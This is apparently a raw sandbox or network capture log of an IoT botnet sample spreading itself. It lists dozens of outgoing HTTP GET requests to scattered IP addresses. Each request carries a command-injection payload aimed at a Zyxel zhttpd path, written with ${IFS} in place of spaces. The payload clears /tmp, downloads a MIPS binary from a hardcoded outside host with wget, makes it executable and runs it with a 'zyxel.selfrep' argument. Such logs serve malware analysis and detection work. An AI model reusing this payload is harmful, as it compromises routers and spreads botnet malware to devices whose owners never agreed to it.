                                                        Jan 28, 2024 10:13:06.672813892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7891192.168.2.1439524221.244.97.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672843933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7892192.168.2.1434490223.134.255.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672889948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7893192.168.2.143410289.217.133.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672908068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7894192.168.2.143482286.91.13.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672960997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7895192.168.2.145367296.18.5.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.672996044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7896192.168.2.1456382121.167.141.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673064947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7897192.168.2.1445886220.209.60.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673101902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7898192.168.2.1444148186.192.1.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673135042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7899192.168.2.1439322192.67.77.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673162937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7900192.168.2.1457266119.109.191.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673203945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7901192.168.2.145798618.154.81.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673237085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7902192.168.2.1451436113.111.59.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673276901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7903192.168.2.143719249.87.243.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673321009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7904192.168.2.1441762109.250.86.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673378944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7905192.168.2.1444446142.210.34.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673445940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7906192.168.2.1448214107.102.28.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673455954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7907192.168.2.1441650217.128.2.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673491001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7908192.168.2.145550685.249.118.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673537016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7909192.168.2.145518860.34.15.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673563957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7910192.168.2.146080259.214.139.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673614025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7911192.168.2.145216631.248.169.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673655033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7912192.168.2.1440180175.179.183.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673686028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7913192.168.2.145610413.55.131.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673716068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7914192.168.2.1456618186.22.133.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673772097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7915192.168.2.144304845.189.60.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673803091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7916192.168.2.143310844.205.134.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673854113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7917192.168.2.145357680.159.145.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673880100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7918192.168.2.1456540148.155.68.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673924923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7919192.168.2.145521438.67.199.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.673979044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7920192.168.2.144520269.44.104.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674029112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7921192.168.2.1457424118.50.19.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674077988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7922192.168.2.1433140109.150.222.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674099922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7923192.168.2.1460248107.144.11.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674144030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7924192.168.2.1435978216.94.4.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674189091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7925192.168.2.1433312138.126.196.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674210072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7926192.168.2.1435342219.115.157.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674252987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7927192.168.2.1451008221.145.178.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674310923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7928192.168.2.1443638112.252.9.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674343109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7929192.168.2.1457698171.127.239.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674387932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7930192.168.2.144487652.119.169.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674428940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7931192.168.2.1457456152.159.49.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674468040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7932192.168.2.144363459.164.110.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674491882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7933192.168.2.144251488.190.122.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674519062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7934192.168.2.143357617.243.87.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674560070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7935192.168.2.1433546213.145.178.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674609900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7936192.168.2.144760647.151.240.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674643040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7937192.168.2.1439906203.46.112.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674695969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7938192.168.2.1442880193.71.120.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674731970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7939192.168.2.1455260170.245.185.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674772978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7940192.168.2.1453972220.37.110.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674828053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7941192.168.2.1449176197.53.149.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674855947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7942192.168.2.1440508181.211.166.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674884081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7943192.168.2.1449162142.201.165.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674930096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7944192.168.2.145390257.133.154.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.674958944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7945192.168.2.143738091.12.159.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675004005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7946192.168.2.145238025.237.111.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675017118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7947192.168.2.14561809.204.155.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675071955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7948192.168.2.1439248173.249.70.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675138950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7949192.168.2.144913686.124.155.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675163984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7950192.168.2.143470845.127.28.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675205946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7951192.168.2.143717438.181.180.214443
                                                        TimestampBytes transferredDirectionData
